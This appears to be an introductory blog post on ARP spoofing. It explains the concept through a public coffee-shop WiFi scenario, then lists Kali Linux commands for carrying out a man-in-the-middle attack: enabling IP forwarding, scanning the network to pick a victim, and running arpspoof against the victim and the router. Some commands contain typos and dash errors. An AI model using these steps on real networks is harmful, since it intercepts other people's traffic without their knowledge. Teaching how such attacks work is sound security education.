MITM attack can be achieved using ARP spoofing. ARP spoofing is also known as ARP cache poisoning or ARP poison routing and it’s a technique used by an attacker to send spoofed Address Resolution Protocol (ARP) messages on a local area network. ARP spoofing may allow an attacker to intercept packets on a network, modify the traffic, or stop all traffic. Often, the goal is to associate the attacker’s MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead.
You’re sitting at your favorite coffee shop and using the coffee shop’s free WIFI. Ideally, your computer (or phone’s) traffic *should* be going directly from your device to the coffee shop’s WIFI router. In most cases, this is what happens; however, the possibility exists that an individual could use ARP spoofing to trick your computer into sending those packets destined for the WIFI router to your computer instead. If/When this happens, the victim (you in this case) would immediately become aware of a problem because their computer would not be able to get on the Internet. A smart attacker will have thought of this in advance and will configure his computer to forward all of your traffic to the WIFI router so that he can capture all of your traffic without you being aware of a problem.
Tools used to duplicate this type of attack:
Computer, Kali Linux, arpspoof (part of the DSniff suite of tools), nmap and/or nbtscan.
Boot up regular computer
Boot up Kali Linux Virtual Machine (although you could achieve this with many other OSes too)
Connect to the Coffee Shop’s WIFI network
Commands to issue:
Echo 1 > /proc/sys/net/ipv4/ip_forward (this forwards all traffic so your victim’s Internet continues to work while the attack is happening)
nmap –n 192.168.0.0/24 (To find a victim)
nbtscan –A 192.168.0.0/24 (To find a victim and/or verify/find MAC addresses)
ifconfig (to determine which network interface to use)
tcpdump -i eth0 (good for finding a victim based on their traffic)
Netstat –nr (To find the WIFI router’s IP addresses)
Terminal 1: arpspoof –I eth0 –t vicitimIP routerIP
Terminal 2: arpspoof –I eth0 –t routerIP victimIP
If the above steps are successful, the attacker has successfully achieved a MITM attack. Once the MITM attack is in place, there are other types of attacks that can be performed that piggy-back off an existing MITM attack. I’ll cover these in the next post…and what can be done to protect against these types of attacks.